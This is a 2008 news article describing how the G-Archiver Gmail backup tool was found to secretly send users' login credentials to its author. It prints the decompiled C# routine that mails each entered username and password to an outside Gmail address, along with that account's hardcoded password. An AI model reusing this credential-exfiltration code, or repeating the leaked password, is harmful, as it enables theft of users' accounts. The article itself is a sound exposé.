Trojan steals Gmail passwords – and charges for it
By David M Williams
Wednesday, 12 March 2008 16:19
The news was broken by excellent software developer and blogger, Jeff Atwood, who was in turn given the details by Dustin Brooks.
Brooks, it transpires, wanted to back up his Gmail account to a local drive. That's an understandable need; with mail storage in the order of gigabytes Gmail is a boon to hoarders and road warriors everywhere. You needn't even constrain yourself to e-mail: utilities exist to let you make use of all that lovely Google-provided disk space as a virtual hard drive. So, Brooks had a bunch of stuff in his Gmail account that he didn't want to lose.
He came across G-Archiver, a tool designed specifically for this very purpose which retails for $US 29.95 and offers a free trial. Brooks duly downloaded the software and gave it a spin. It prompted for his Gmail login details and he handed them over. G-Archiver performed its basic task but didn't quite do what Brooks would have liked.
Not to worry, being a computer programmer himself he used Lutz Roeder's well-known Reflector software to do a bit of reverse engineering. Now, ordinarily trying to figure out someone else's proprietary source code is ethically dodgy, if not illegal. However, what Brooks discovered completely overshadowed any such concerns.
A Gmail user, undoubtedly part of the G-Archiver development team, if not the author himself, called John Terry had hardcoded their Gmail username and password into the source code. And then he noticed every time a user ran G-Archiver and added a new Gmail account the program would e-mail these credentials to John Terry's mailbox! This very code was clearly visible within the file SM.dll installed by the software:
public static void CheckConnection(string a, string b) {
try {
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception) { }
}
The key lines to note are the ones which begin with message.Body; here an e-mail message is built up with the literal strings "Username:" and "Password:" followed by the user's username and password as passed in to the function.
The code sends this message through Gmail to the address JTerry79@gmail.com using that very account with password bilal482.
Brooks was concerned; after all, he'd just typed in his own login details! He fired up his web browser, called up Gmail and logged in to John Terry's account with the username and password contained within the bowels of G-Archiver. What he saw stunned him again.
Please read on to find out what happened.
CONTINUED
IT Institute industry certifications earn you credit towards our MBA or Master Degree qualification with Charles Sturt University. Click 
